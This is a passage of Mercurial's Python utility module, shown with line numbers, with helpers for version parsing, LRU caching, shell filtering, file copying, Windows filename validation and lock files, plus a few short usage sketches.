431 428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
432 429 stderr=subprocess.PIPE,
433 430 universal_newlines=newlines,
434 431 env=env)
435 432 return p.stdin, p.stdout, p.stderr, p
436 433
437 434 def version():
438 435 """Return version information if available."""
439 436 try:
440 437 from . import __version__
441 438 return __version__.version
442 439 except ImportError:
443 440 return 'unknown'
444 441
445 442 def versiontuple(v=None, n=4):
446 443 """Parses a Mercurial version string into an N-tuple.
447 444
448 445 The version string to be parsed is specified with the ``v`` argument.
449 446 If it isn't defined, the current Mercurial version string will be parsed.
450 447
451 448 ``n`` can be 2, 3, or 4. Here is how some version strings map to
452 449 returned values:
453 450
454 451 >>> v = '3.6.1+190-df9b73d2d444'
455 452 >>> versiontuple(v, 2)
456 453 (3, 6)
457 454 >>> versiontuple(v, 3)
458 455 (3, 6, 1)
459 456 >>> versiontuple(v, 4)
460 457 (3, 6, 1, '190-df9b73d2d444')
461 458
462 459 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
463 460 (3, 6, 1, '190-df9b73d2d444+20151118')
464 461
465 462 >>> v = '3.6'
466 463 >>> versiontuple(v, 2)
467 464 (3, 6)
468 465 >>> versiontuple(v, 3)
469 466 (3, 6, None)
470 467 >>> versiontuple(v, 4)
471 468 (3, 6, None, None)
472 469
473 470 >>> v = '3.9-rc'
474 471 >>> versiontuple(v, 2)
475 472 (3, 9)
476 473 >>> versiontuple(v, 3)
477 474 (3, 9, None)
478 475 >>> versiontuple(v, 4)
479 476 (3, 9, None, 'rc')
480 477
481 478 >>> v = '3.9-rc+2-02a8fea4289b'
482 479 >>> versiontuple(v, 2)
483 480 (3, 9)
484 481 >>> versiontuple(v, 3)
485 482 (3, 9, None)
486 483 >>> versiontuple(v, 4)
487 484 (3, 9, None, 'rc+2-02a8fea4289b')
488 485 """
489 486 if not v:
490 487 v = version()
491 488 parts = remod.split('[\+-]', v, 1)
492 489 if len(parts) == 1:
493 490 vparts, extra = parts[0], None
494 491 else:
495 492 vparts, extra = parts
496 493
497 494 vints = []
498 495 for i in vparts.split('.'):
499 496 try:
500 497 vints.append(int(i))
501 498 except ValueError:
502 499 break
503 500 # (3, 6) -> (3, 6, None)
504 501 while len(vints) < 3:
505 502 vints.append(None)
506 503
507 504 if n == 2:
508 505 return (vints[0], vints[1])
509 506 if n == 3:
510 507 return (vints[0], vints[1], vints[2])
511 508 if n == 4:
512 509 return (vints[0], vints[1], vints[2], extra)
513 510
514 511 # used by parsedate
515 512 defaultdateformats = (
516 513 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
517 514 '%Y-%m-%dT%H:%M', # without seconds
518 515 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
519 516 '%Y-%m-%dT%H%M', # without seconds
520 517 '%Y-%m-%d %H:%M:%S', # our common legal variant
521 518 '%Y-%m-%d %H:%M', # without seconds
522 519 '%Y-%m-%d %H%M%S', # without :
523 520 '%Y-%m-%d %H%M', # without seconds
524 521 '%Y-%m-%d %I:%M:%S%p',
525 522 '%Y-%m-%d %H:%M',
526 523 '%Y-%m-%d %I:%M%p',
527 524 '%Y-%m-%d',
528 525 '%m-%d',
529 526 '%m/%d',
530 527 '%m/%d/%y',
531 528 '%m/%d/%Y',
532 529 '%a %b %d %H:%M:%S %Y',
533 530 '%a %b %d %I:%M:%S%p %Y',
534 531 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
535 532 '%b %d %H:%M:%S %Y',
536 533 '%b %d %I:%M:%S%p %Y',
537 534 '%b %d %H:%M:%S',
538 535 '%b %d %I:%M:%S%p',
539 536 '%b %d %H:%M',
540 537 '%b %d %I:%M%p',
541 538 '%b %d %Y',
542 539 '%b %d',
543 540 '%H:%M:%S',
544 541 '%I:%M:%S%p',
545 542 '%H:%M',
546 543 '%I:%M%p',
547 544 )
548 545
549 546 extendeddateformats = defaultdateformats + (
550 547 "%Y",
551 548 "%Y-%m",
552 549 "%b",
553 550 "%b %Y",
554 551 )
555 552
556 553 def cachefunc(func):
557 554 '''cache the result of function calls'''
558 555 # XXX doesn't handle keyword args
559 556 if func.__code__.co_argcount == 0:
560 557 cache = []
561 558 def f():
562 559 if len(cache) == 0:
563 560 cache.append(func())
564 561 return cache[0]
565 562 return f
566 563 cache = {}
567 564 if func.__code__.co_argcount == 1:
568 565 # we gain a small amount of time because
569 566 # we don't need to pack/unpack the list
570 567 def f(arg):
571 568 if arg not in cache:
572 569 cache[arg] = func(arg)
573 570 return cache[arg]
574 571 else:
575 572 def f(*args):
576 573 if args not in cache:
577 574 cache[args] = func(*args)
578 575 return cache[args]
579 576
580 577 return f
581 578
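A minimal memoization sketch (fib is a hypothetical example function):

    @cachefunc                  # one positional argument -> keyed dict cache
    def fib(n):
        return n if n < 2 else fib(n - 1) + fib(n - 2)

    fib(30)                     # recursive calls hit the cache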
582 579 class sortdict(collections.OrderedDict):
583 580 '''a simple sorted dictionary
584 581
585 582 >>> d1 = sortdict([('a', 0), ('b', 1)])
586 583 >>> d2 = d1.copy()
587 584 >>> d2
588 585 sortdict([('a', 0), ('b', 1)])
589 586 >>> d2.update([('a', 2)])
590 587 >>> d2.keys() # should still be in last-set order
591 588 ['b', 'a']
592 589 '''
593 590
594 591 def __setitem__(self, key, value):
595 592 if key in self:
596 593 del self[key]
597 594 super(sortdict, self).__setitem__(key, value)
598 595
599 596 if pycompat.ispypy:
600 597 # __setitem__() isn't called as of PyPy 5.8.0
601 598 def update(self, src):
602 599 if isinstance(src, dict):
603 600 src = src.iteritems()
604 601 for k, v in src:
605 602 self[k] = v
606 603
607 604 class transactional(object):
608 605 """Base class for making a transactional type into a context manager."""
609 606 __metaclass__ = abc.ABCMeta
610 607
611 608 @abc.abstractmethod
612 609 def close(self):
613 610 """Successfully closes the transaction."""
614 611
615 612 @abc.abstractmethod
616 613 def release(self):
617 614 """Marks the end of the transaction.
618 615
619 616 If the transaction has not been closed, it will be aborted.
620 617 """
621 618
622 619 def __enter__(self):
623 620 return self
624 621
625 622 def __exit__(self, exc_type, exc_val, exc_tb):
626 623 try:
627 624 if exc_type is None:
628 625 self.close()
629 626 finally:
630 627 self.release()
631 628
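A runnable sketch of the contract (the subclass is hypothetical):

    class demotx(transactional):
        def close(self):
            print('closed')
        def release(self):
            print('released')

    with demotx():
        pass    # normal exit: close() commits, then release() runs
    # an exception inside the block skips close(), so release() aborts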
632 629 @contextlib.contextmanager
633 630 def acceptintervention(tr=None):
634 631 """A context manager that closes the transaction on InterventionRequired
635 632
636 633 If no transaction was provided, this simply runs the body and returns
637 634 """
638 635 if not tr:
639 636 yield
640 637 return
641 638 try:
642 639 yield
643 640 tr.close()
644 641 except error.InterventionRequired:
645 642 tr.close()
646 643 raise
647 644 finally:
648 645 tr.release()
649 646
650 647 @contextlib.contextmanager
651 648 def nullcontextmanager():
652 649 yield
653 650
654 651 class _lrucachenode(object):
655 652 """A node in a doubly linked list.
656 653
657 654 Holds a reference to nodes on either side as well as a key-value
658 655 pair for the dictionary entry.
659 656 """
660 657 __slots__ = (u'next', u'prev', u'key', u'value')
661 658
662 659 def __init__(self):
663 660 self.next = None
664 661 self.prev = None
665 662
666 663 self.key = _notset
667 664 self.value = None
668 665
669 666 def markempty(self):
670 667 """Mark the node as emptied."""
671 668 self.key = _notset
672 669
673 670 class lrucachedict(object):
674 671 """Dict that caches most recent accesses and sets.
675 672
676 673 The dict consists of an actual backing dict - indexed by original
677 674 key - and a doubly linked circular list defining the order of entries in
678 675 the cache.
679 676
680 677 The head node is the newest entry in the cache. If the cache is full,
681 678 we recycle head.prev and make it the new head. Cache accesses result in
682 679 the node being moved to before the existing head and being marked as the
683 680 new head node.
684 681 """
685 682 def __init__(self, max):
686 683 self._cache = {}
687 684
688 685 self._head = head = _lrucachenode()
689 686 head.prev = head
690 687 head.next = head
691 688 self._size = 1
692 689 self._capacity = max
693 690
694 691 def __len__(self):
695 692 return len(self._cache)
696 693
697 694 def __contains__(self, k):
698 695 return k in self._cache
699 696
700 697 def __iter__(self):
701 698 # We don't have to iterate in cache order, but why not.
702 699 n = self._head
703 700 for i in range(len(self._cache)):
704 701 yield n.key
705 702 n = n.next
706 703
707 704 def __getitem__(self, k):
708 705 node = self._cache[k]
709 706 self._movetohead(node)
710 707 return node.value
711 708
712 709 def __setitem__(self, k, v):
713 710 node = self._cache.get(k)
714 711 # Replace existing value and mark as newest.
715 712 if node is not None:
716 713 node.value = v
717 714 self._movetohead(node)
718 715 return
719 716
720 717 if self._size < self._capacity:
721 718 node = self._addcapacity()
722 719 else:
723 720 # Grab the last/oldest item.
724 721 node = self._head.prev
725 722
726 723 # At capacity. Kill the old entry.
727 724 if node.key is not _notset:
728 725 del self._cache[node.key]
729 726
730 727 node.key = k
731 728 node.value = v
732 729 self._cache[k] = node
733 730 # And mark it as newest entry. No need to adjust order since it
734 731 # is already self._head.prev.
735 732 self._head = node
736 733
737 734 def __delitem__(self, k):
738 735 node = self._cache.pop(k)
739 736 node.markempty()
740 737
741 738 # Temporarily mark as newest item before re-adjusting head to make
742 739 # this node the oldest item.
743 740 self._movetohead(node)
744 741 self._head = node.next
745 742
746 743 # Additional dict methods.
747 744
748 745 def get(self, k, default=None):
749 746 try:
750 747 return self._cache[k].value
751 748 except KeyError:
752 749 return default
753 750
754 751 def clear(self):
755 752 n = self._head
756 753 while n.key is not _notset:
757 754 n.markempty()
758 755 n = n.next
759 756
760 757 self._cache.clear()
761 758
762 759 def copy(self):
763 760 result = lrucachedict(self._capacity)
764 761 n = self._head.prev
765 762 # Iterate in oldest-to-newest order, so the copy has the right ordering
766 763 for i in range(len(self._cache)):
767 764 result[n.key] = n.value
768 765 n = n.prev
769 766 return result
770 767
771 768 def _movetohead(self, node):
772 769 """Mark a node as the newest, making it the new head.
773 770
774 771 When a node is accessed, it becomes the freshest entry in the LRU
775 772 list, which is denoted by self._head.
776 773
777 774 Visually, let's make ``N`` the new head node (* denotes head):
778 775
779 776 previous/oldest <-> head <-> next/next newest
780 777
781 778 ----<->--- A* ---<->-----
782 779 | |
783 780 E <-> D <-> N <-> C <-> B
784 781
785 782 To:
786 783
787 784 ----<->--- N* ---<->-----
788 785 | |
789 786 E <-> D <-> C <-> B <-> A
790 787
791 788 This requires the following moves:
792 789
793 790 C.next = D (node.prev.next = node.next)
794 791 D.prev = C (node.next.prev = node.prev)
795 792 E.next = N (head.prev.next = node)
796 793 N.prev = E (node.prev = head.prev)
797 794 N.next = A (node.next = head)
798 795 A.prev = N (head.prev = node)
799 796 """
800 797 head = self._head
801 798 # C.next = D
802 799 node.prev.next = node.next
803 800 # D.prev = C
804 801 node.next.prev = node.prev
805 802 # N.prev = E
806 803 node.prev = head.prev
807 804 # N.next = A
808 805 # It is tempting to do just "head" here, however if node is
809 806 # adjacent to head, this will do bad things.
810 807 node.next = head.prev.next
811 808 # E.next = N
812 809 node.next.prev = node
813 810 # A.prev = N
814 811 node.prev.next = node
815 812
816 813 self._head = node
817 814
818 815 def _addcapacity(self):
819 816 """Add a node to the circular linked list.
820 817
821 818 The new node is inserted before the head node.
822 819 """
823 820 head = self._head
824 821 node = _lrucachenode()
825 822 head.prev.next = node
826 823 node.prev = head.prev
827 824 node.next = head
828 825 head.prev = node
829 826 self._size += 1
830 827 return node
831 828
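A small sketch of the eviction order described above (capacity two, hypothetical keys):

    d = lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['a']              # access refreshes 'a', so 'b' is now oldest
    d['c'] = 3          # at capacity: the oldest node is recycled
    'b' in d            # -> False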
832 829 def lrucachefunc(func):
833 830 '''cache most recent results of function calls'''
834 831 cache = {}
835 832 order = collections.deque()
836 833 if func.__code__.co_argcount == 1:
837 834 def f(arg):
838 835 if arg not in cache:
839 836 if len(cache) > 20:
840 837 del cache[order.popleft()]
841 838 cache[arg] = func(arg)
842 839 else:
843 840 order.remove(arg)
844 841 order.append(arg)
845 842 return cache[arg]
846 843 else:
847 844 def f(*args):
848 845 if args not in cache:
849 846 if len(cache) > 20:
850 847 del cache[order.popleft()]
851 848 cache[args] = func(*args)
852 849 else:
853 850 order.remove(args)
854 851 order.append(args)
855 852 return cache[args]
856 853
857 854 return f
858 855
859 856 class propertycache(object):
860 857 def __init__(self, func):
861 858 self.func = func
862 859 self.name = func.__name__
863 860 def __get__(self, obj, type=None):
864 861 result = self.func(obj)
865 862 self.cachevalue(obj, result)
866 863 return result
867 864
868 865 def cachevalue(self, obj, value):
869 866 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
870 867 obj.__dict__[self.name] = value
871 868
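A sketch of the run-once behavior (the class and printout are hypothetical):

    class example(object):
        @propertycache
        def answer(self):
            print('computed once')
            return 42

    e = example()
    e.answer    # computes, then cachevalue() stores 42 in e.__dict__
    e.answer    # served from the instance dict; the descriptor never runs again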
872 869 def pipefilter(s, cmd):
873 870 '''filter string S through command CMD, returning its output'''
874 871 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
875 872 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
876 873 pout, perr = p.communicate(s)
877 874 return pout
878 875
879 876 def tempfilter(s, cmd):
880 877 '''filter string S through a pair of temporary files with CMD.
881 878 CMD is used as a template to create the real command to be run,
882 879 with the strings INFILE and OUTFILE replaced by the real names of
883 880 the temporary files generated.'''
884 881 inname, outname = None, None
885 882 try:
886 883 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
887 884 fp = os.fdopen(infd, pycompat.sysstr('wb'))
888 885 fp.write(s)
889 886 fp.close()
890 887 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
891 888 os.close(outfd)
892 889 cmd = cmd.replace('INFILE', inname)
893 890 cmd = cmd.replace('OUTFILE', outname)
894 891 code = os.system(cmd)
895 892 if pycompat.sysplatform == 'OpenVMS' and code & 1:
896 893 code = 0
897 894 if code:
898 895 raise Abort(_("command '%s' failed: %s") %
899 896 (cmd, explainexit(code)))
900 897 return readfile(outname)
901 898 finally:
902 899 try:
903 900 if inname:
904 901 os.unlink(inname)
905 902 except OSError:
906 903 pass
907 904 try:
908 905 if outname:
909 906 os.unlink(outname)
910 907 except OSError:
911 908 pass
912 909
913 910 filtertable = {
914 911 'tempfile:': tempfilter,
915 912 'pipe:': pipefilter,
916 913 }
917 914
918 915 def filter(s, cmd):
919 916 "filter a string through a command that transforms its input to its output"
920 917 for name, fn in filtertable.iteritems():
921 918 if cmd.startswith(name):
922 919 return fn(s, cmd[len(name):].lstrip())
923 920 return pipefilter(s, cmd)
924 921
925 922 def binary(s):
926 923 """return true if a string is binary data"""
927 924 return bool(s and '\0' in s)
928 925
929 926 def increasingchunks(source, min=1024, max=65536):
930 927 '''return no less than min bytes per chunk while data remains,
931 928 doubling min after each chunk until it reaches max'''
932 929 def log2(x):
933 930 if not x:
934 931 return 0
935 932 i = 0
936 933 while x:
937 934 x >>= 1
938 935 i += 1
939 936 return i - 1
940 937
941 938 buf = []
942 939 blen = 0
943 940 for chunk in source:
944 941 buf.append(chunk)
945 942 blen += len(chunk)
946 943 if blen >= min:
947 944 if min < max:
948 945 min = min << 1
949 946 nmin = 1 << log2(blen)
950 947 if nmin > min:
951 948 min = nmin
952 949 if min > max:
953 950 min = max
954 951 yield ''.join(buf)
955 952 blen = 0
956 953 buf = []
957 954 if buf:
958 955 yield ''.join(buf)
959 956
960 957 Abort = error.Abort
961 958
962 959 def always(fn):
963 960 return True
964 961
965 962 def never(fn):
966 963 return False
967 964
968 965 def nogc(func):
969 966 """disable garbage collector
970 967
971 968 Python's garbage collector triggers a GC each time a certain number of
972 969 container objects (the number being defined by gc.get_threshold()) are
973 970 allocated even when marked not to be tracked by the collector. Tracking has
974 971 no effect on when GCs are triggered, only on what objects the GC looks
975 972 into. As a workaround, disable GC while building complex (huge)
976 973 containers.
977 974
978 975 This garbage collector issue has been fixed in 2.7, but it still affects
979 976 CPython's performance.
980 977 """
981 978 def wrapper(*args, **kwargs):
982 979 gcenabled = gc.isenabled()
983 980 gc.disable()
984 981 try:
985 982 return func(*args, **kwargs)
986 983 finally:
987 984 if gcenabled:
988 985 gc.enable()
989 986 return wrapper
990 987
991 988 if pycompat.ispypy:
992 989 # PyPy runs slower with gc disabled
993 990 nogc = lambda x: x
994 991
995 992 def pathto(root, n1, n2):
996 993 '''return the relative path from one place to another.
997 994 root should use os.sep to separate directories
998 995 n1 should use os.sep to separate directories
999 996 n2 should use "/" to separate directories
1000 997 returns an os.sep-separated path.
1001 998
1002 999 If n1 is a relative path, it's assumed it's
1003 1000 relative to root.
1004 1001 n2 should always be relative to root.
1005 1002 '''
1006 1003 if not n1:
1007 1004 return localpath(n2)
1008 1005 if os.path.isabs(n1):
1009 1006 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1010 1007 return os.path.join(root, localpath(n2))
1011 1008 n2 = '/'.join((pconvert(root), n2))
1012 1009 a, b = splitpath(n1), n2.split('/')
1013 1010 a.reverse()
1014 1011 b.reverse()
1015 1012 while a and b and a[-1] == b[-1]:
1016 1013 a.pop()
1017 1014 b.pop()
1018 1015 b.reverse()
1019 1016 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1020 1017
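A worked example on POSIX (hypothetical paths; on Python 3 the arguments and result would be bytes):

    # from working directory 'a/b' up to the repo-relative file 'c/d'
    pathto('/repo', 'a/b', 'c/d')   # -> '../../c/d'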
1021 1018 def mainfrozen():
1022 1019 """return True if we are a frozen executable.
1023 1020
1024 1021 The code supports py2exe (most common, Windows only) and tools/freeze
1025 1022 (portable, not much used).
1026 1023 """
1027 1024 return (safehasattr(sys, "frozen") or # new py2exe
1028 1025 safehasattr(sys, "importers") or # old py2exe
1029 1026 imp.is_frozen(u"__main__")) # tools/freeze
1030 1027
1031 1028 # the location of data files matching the source code
1032 1029 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1033 1030 # executable version (py2exe) doesn't support __file__
1034 1031 datapath = os.path.dirname(pycompat.sysexecutable)
1035 1032 else:
1036 1033 datapath = os.path.dirname(pycompat.fsencode(__file__))
1037 1034
1038 1035 i18n.setdatapath(datapath)
1039 1036
1040 1037 _hgexecutable = None
1041 1038
1042 1039 def hgexecutable():
1043 1040 """return location of the 'hg' executable.
1044 1041
1045 1042 Defaults to $HG or 'hg' in the search path.
1046 1043 """
1047 1044 if _hgexecutable is None:
1048 1045 hg = encoding.environ.get('HG')
1049 1046 mainmod = sys.modules[pycompat.sysstr('__main__')]
1050 1047 if hg:
1051 1048 _sethgexecutable(hg)
1052 1049 elif mainfrozen():
1053 1050 if getattr(sys, 'frozen', None) == 'macosx_app':
1054 1051 # Env variable set by py2app
1055 1052 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1056 1053 else:
1057 1054 _sethgexecutable(pycompat.sysexecutable)
1058 1055 elif (os.path.basename(
1059 1056 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1060 1057 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1061 1058 else:
1062 1059 exe = findexe('hg') or os.path.basename(sys.argv[0])
1063 1060 _sethgexecutable(exe)
1064 1061 return _hgexecutable
1065 1062
1066 1063 def _sethgexecutable(path):
1067 1064 """set location of the 'hg' executable"""
1068 1065 global _hgexecutable
1069 1066 _hgexecutable = path
1070 1067
1071 1068 def _isstdout(f):
1072 1069 fileno = getattr(f, 'fileno', None)
1073 1070 return fileno and fileno() == sys.__stdout__.fileno()
1074 1071
1075 1072 def shellenviron(environ=None):
1076 1073 """return environ with optional override, useful for shelling out"""
1077 1074 def py2shell(val):
1078 1075 'convert python object into string that is useful to shell'
1079 1076 if val is None or val is False:
1080 1077 return '0'
1081 1078 if val is True:
1082 1079 return '1'
1083 1080 return str(val)
1084 1081 env = dict(encoding.environ)
1085 1082 if environ:
1086 1083 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1087 1084 env['HG'] = hgexecutable()
1088 1085 return env
1089 1086
1090 1087 def system(cmd, environ=None, cwd=None, out=None):
1091 1088 '''enhanced shell command execution.
1092 1089 run with environment maybe modified, maybe in different dir.
1093 1090
1094 1091 if out is specified, it is assumed to be a file-like object that has a
1095 1092 write() method. stdout and stderr will be redirected to out.'''
1096 1093 try:
1097 1094 stdout.flush()
1098 1095 except Exception:
1099 1096 pass
1100 1097 cmd = quotecommand(cmd)
1101 1098 env = shellenviron(environ)
1102 1099 if out is None or _isstdout(out):
1103 1100 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1104 1101 env=env, cwd=cwd)
1105 1102 else:
1106 1103 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1107 1104 env=env, cwd=cwd, stdout=subprocess.PIPE,
1108 1105 stderr=subprocess.STDOUT)
1109 1106 for line in iter(proc.stdout.readline, ''):
1110 1107 out.write(line)
1111 1108 proc.wait()
1112 1109 rc = proc.returncode
1113 1110 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1114 1111 rc = 0
1115 1112 return rc
1116 1113
1117 1114 def checksignature(func):
1118 1115 '''wrap a function with code to check for calling errors'''
1119 1116 def check(*args, **kwargs):
1120 1117 try:
1121 1118 return func(*args, **kwargs)
1122 1119 except TypeError:
1123 1120 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1124 1121 raise error.SignatureError
1125 1122 raise
1126 1123
1127 1124 return check
1128 1125
1129 1126 # a whitelist of known filesystems where hardlinks work reliably
1130 1127 _hardlinkfswhitelist = {
1131 1128 'btrfs',
1132 1129 'ext2',
1133 1130 'ext3',
1134 1131 'ext4',
1135 1132 'hfs',
1136 1133 'jfs',
1137 1134 'reiserfs',
1138 1135 'tmpfs',
1139 1136 'ufs',
1140 1137 'xfs',
1141 1138 'zfs',
1142 1139 }
1143 1140
1144 1141 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1145 1142 '''copy a file, preserving mode and optionally other stat info like
1146 1143 atime/mtime
1147 1144
1148 1145 checkambig argument is used with filestat, and is useful only if the
1149 1146 destination file is guarded by some lock (e.g. repo.lock or
1150 1147 repo.wlock).
1151 1148
1152 1149 copystat and checkambig should be exclusive.
1153 1150 '''
1154 1151 assert not (copystat and checkambig)
1155 1152 oldstat = None
1156 1153 if os.path.lexists(dest):
1157 1154 if checkambig:
1158 1155 oldstat = checkambig and filestat.frompath(dest)
1159 1156 unlink(dest)
1160 1157 if hardlink:
1161 1158 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1162 1159 # unless we are confident that dest is on a whitelisted filesystem.
1163 1160 try:
1164 1161 fstype = getfstype(os.path.dirname(dest))
1165 1162 except OSError:
1166 1163 fstype = None
1167 1164 if fstype not in _hardlinkfswhitelist:
1168 1165 hardlink = False
1169 1166 if hardlink:
1170 1167 try:
1171 1168 oslink(src, dest)
1172 1169 return
1173 1170 except (IOError, OSError):
1174 1171 pass # fall back to normal copy
1175 1172 if os.path.islink(src):
1176 1173 os.symlink(os.readlink(src), dest)
1177 1174 # copytime is ignored for symlinks, but in general copytime isn't needed
1178 1175 # for them anyway
1179 1176 else:
1180 1177 try:
1181 1178 shutil.copyfile(src, dest)
1182 1179 if copystat:
1183 1180 # copystat also copies mode
1184 1181 shutil.copystat(src, dest)
1185 1182 else:
1186 1183 shutil.copymode(src, dest)
1187 1184 if oldstat and oldstat.stat:
1188 1185 newstat = filestat.frompath(dest)
1189 1186 if newstat.isambig(oldstat):
1190 1187 # stat of copied file is ambiguous to original one
1191 1188 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1192 1189 os.utime(dest, (advanced, advanced))
1193 1190 except shutil.Error as inst:
1194 1191 raise Abort(str(inst))
1195 1192
1196 1193 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1197 1194 """Copy a directory tree using hardlinks if possible."""
1198 1195 num = 0
1199 1196
1200 1197 gettopic = lambda: hardlink and _('linking') or _('copying')
1201 1198
1202 1199 if os.path.isdir(src):
1203 1200 if hardlink is None:
1204 1201 hardlink = (os.stat(src).st_dev ==
1205 1202 os.stat(os.path.dirname(dst)).st_dev)
1206 1203 topic = gettopic()
1207 1204 os.mkdir(dst)
1208 1205 for name, kind in listdir(src):
1209 1206 srcname = os.path.join(src, name)
1210 1207 dstname = os.path.join(dst, name)
1211 1208 def nprog(t, pos):
1212 1209 if pos is not None:
1213 1210 return progress(t, pos + num)
1214 1211 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1215 1212 num += n
1216 1213 else:
1217 1214 if hardlink is None:
1218 1215 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1219 1216 os.stat(os.path.dirname(dst)).st_dev)
1220 1217 topic = gettopic()
1221 1218
1222 1219 if hardlink:
1223 1220 try:
1224 1221 oslink(src, dst)
1225 1222 except (IOError, OSError):
1226 1223 hardlink = False
1227 1224 shutil.copy(src, dst)
1228 1225 else:
1229 1226 shutil.copy(src, dst)
1230 1227 num += 1
1231 1228 progress(topic, num)
1232 1229 progress(topic, None)
1233 1230
1234 1231 return hardlink, num
1235 1232
1236 1233 _winreservednames = b'''con prn aux nul
1237 1234 com1 com2 com3 com4 com5 com6 com7 com8 com9
1238 1235 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1239 1236 _winreservedchars = ':*?"<>|'
1240 1237 def checkwinfilename(path):
1241 1238 r'''Check that the base-relative path is a valid filename on Windows.
1242 1239 Returns None if the path is ok, or a UI string describing the problem.
1243 1240
1244 1241 >>> checkwinfilename("just/a/normal/path")
1245 1242 >>> checkwinfilename("foo/bar/con.xml")
1246 1243 "filename contains 'con', which is reserved on Windows"
1247 1244 >>> checkwinfilename("foo/con.xml/bar")
1248 1245 "filename contains 'con', which is reserved on Windows"
1249 1246 >>> checkwinfilename("foo/bar/xml.con")
1250 1247 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1251 1248 "filename contains 'AUX', which is reserved on Windows"
1252 1249 >>> checkwinfilename("foo/bar/bla:.txt")
1253 1250 "filename contains ':', which is reserved on Windows"
1254 1251 >>> checkwinfilename("foo/bar/b\07la.txt")
1255 1252 "filename contains '\\x07', which is invalid on Windows"
1256 1253 >>> checkwinfilename("foo/bar/bla ")
1257 1254 "filename ends with ' ', which is not allowed on Windows"
1258 1255 >>> checkwinfilename("../bar")
1259 1256 >>> checkwinfilename("foo\\")
1260 1257 "filename ends with '\\', which is invalid on Windows"
1261 1258 >>> checkwinfilename("foo\\/bar")
1262 1259 "directory name ends with '\\', which is invalid on Windows"
1263 1260 '''
1264 1261 if path.endswith('\\'):
1265 1262 return _("filename ends with '\\', which is invalid on Windows")
1266 1263 if '\\/' in path:
1267 1264 return _("directory name ends with '\\', which is invalid on Windows")
1268 1265 for n in path.replace('\\', '/').split('/'):
1269 1266 if not n:
1270 1267 continue
1271 1268 for c in _filenamebytestr(n):
1272 1269 if c in _winreservedchars:
1273 1270 return _("filename contains '%s', which is reserved "
1274 1271 "on Windows") % c
1275 1272 if ord(c) <= 31:
1276 1273 return _("filename contains %r, which is invalid "
1277 1274 "on Windows") % c
1278 1275 base = n.split('.')[0]
1279 1276 if base and base.lower() in _winreservednames:
1280 1277 return _("filename contains '%s', which is reserved "
1281 1278 "on Windows") % base
1282 1279 t = n[-1]
1283 1280 if t in '. ' and n not in '..':
1284 1281 return _("filename ends with '%s', which is not allowed "
1285 1282 "on Windows") % t
1286 1283
1287 1284 if pycompat.osname == 'nt':
1288 1285 checkosfilename = checkwinfilename
1289 1286 timer = time.clock
1290 1287 else:
1291 1288 checkosfilename = platform.checkosfilename
1292 1289 timer = time.time
1293 1290
1294 1291 if safehasattr(time, "perf_counter"):
1295 1292 timer = time.perf_counter
1296 1293
1297 1294 def makelock(info, pathname):
1298 1295 try:
1299 1296 return os.symlink(info, pathname)
1300 1297 except OSError as why:
1301 1298 if why.errno == errno.EEXIST:
1302 1299 raise
1303 1300 except AttributeError: # no symlink in os
1304 1301 pass
1305 1302
1306 1303 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1307 1304 os.write(ld, info)
1308 1305 os.close(ld)
1309 1306
1310 1307 def readlock(pathname):
1311 1308 try:
1312 1309 return os.readlink(pathname)
1313 1310 except OSError as why:
1314 1311 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1315 1312 raise
1316 1313 except AttributeError: # no symlink in os
1317 1314 pass
1318 1315 fp = posixfile(pathname)
1319 1316 r = fp.read()
1320 1317 fp.close()
1321 1318 return r
1322 1319
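# Sketch (not part of the original source): makelock() stores the holder
# description in a symlink target where the OS supports symlinks, and falls
# back to an exclusively-created regular file; readlock() mirrors both cases.
# 'lockname' is a hypothetical path.
def _demolock(info, lockname):
    makelock(info, lockname)       # symlink (or O_EXCL file) holding 'info'
    try:
        return readlock(lockname)  # round-trips the holder description
    finally:
        os.unlink(lockname)
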
1323 1320 def fstat(fp):
1324 1321 '''stat file object that may not have fileno method.'''
1325 1322 try:
1326 1323 return os.fstat(fp.fileno())
1327 1324 except AttributeError:
1328 1325 return os.stat(fp.name)
1329 1326
1330 1327 # File system features
1331 1328
1332 1329 def fscasesensitive(path):
1333 1330 """
1334 1331 Return true if the given path is on a case-sensitive filesystem
1335 1332
1336 1333 Requires a path (like /foo/.hg) ending with a foldable final
1337 1334 directory component.
1338 1335 """
1339 1336 s1 = os.lstat(path)
1340 1337 d, b = os.path.split(path)
1341 1338 b2 = b.upper()
1342 1339 if b == b2:
1343 1340 b2 = b.lower()
1344 1341 if b == b2:
1345 1342 return True # no evidence against case sensitivity
1346 1343 p2 = os.path.join(d, b2)
1347 1344 try:
1348 1345 s2 = os.lstat(p2)
1349 1346 if s2 == s1:
1350 1347 return False
1351 1348 return True
1352 1349 except OSError:
1353 1350 return True
1354 1351
1355 1352 try:
1356 1353 import re2
